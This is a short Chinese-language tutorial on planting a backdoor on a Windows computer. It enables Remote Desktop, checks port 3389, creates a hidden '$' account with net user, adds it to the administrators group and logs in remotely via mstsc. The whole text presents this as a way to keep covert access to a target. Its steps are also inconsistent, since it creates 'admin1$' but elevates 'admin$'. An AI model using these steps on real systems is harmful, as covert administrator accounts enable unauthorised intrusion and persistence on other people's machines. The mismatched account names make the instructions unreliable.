首先我们将windows中的远程桌面打开
我的计算机>属性>远程桌面>打开(默认是关闭)
通常远程桌面的端口为3389,我们可以win+r输入netstat -ano查看3389是否开启了,开启则表明此计算机可以被远程登录
我们留下后门进行远程登录的条件无非是得在系统中创建一个属于我们的隐藏账户,那么我们接下来创建隐藏账户。
第一步:win+r:net user admin1$($表示为隐藏账户)123(密码) /add 创建隐藏账户
第二步:win+r:net localgroup administrators(管理员组名称) admin$(用户名)/add 提权为管理员
第三步:win+mstsc:输入目标的ip地址用隐藏账户进行登录即可